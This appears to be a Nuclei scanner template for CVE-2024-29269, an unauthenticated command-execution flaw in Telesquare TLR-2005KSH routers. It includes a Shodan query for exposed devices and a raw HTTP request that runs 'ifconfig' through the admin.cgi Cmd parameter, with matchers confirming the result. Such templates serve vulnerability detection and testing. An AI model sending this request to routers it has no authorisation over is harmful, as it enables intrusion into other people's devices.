54 lines
1.8 KiB
YAML
54 lines
1.8 KiB
YAML
id: CVE-2024-29269
|
|
|
|
info:
|
|
name: Telesquare TLR-2005KSH - Remote Command Execution
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: |
|
|
Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
|
|
reference:
|
|
- https://github.com/wutalent/CVE-2024-29269/blob/main/index.md
|
|
- https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b
|
|
- https://github.com/Ostorlab/KEV
|
|
- https://github.com/YongYe-Security/CVE-2024-29269
|
|
- https://github.com/nomi-sec/PoC-in-GitHub
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-29269
|
|
epss-score: 0.00054
|
|
epss-percentile: 0.21518
|
|
cpe: cpe:2.3:h:telesquare:tlr-2005ksh:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"Login to TLR-2005KSH"
|
|
product: tlr-2005ksh
|
|
vendor: telesquare
|
|
tags: cve,cve2024,telesquare,tlr,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<CmdResult>'
|
|
- '</xml>'
|
|
- 'Ethernet'
|
|
- 'inet'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/xml'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100c26ea134200beabe7afd1480ed3966b972728e76df2b7b8ea664ac641df45149022076218c6a1a92d4df296865ed32f65929ee1a6e000ecc53cca7938aeb958f52c7:922c64590222798bb761d5b6d8e72950 |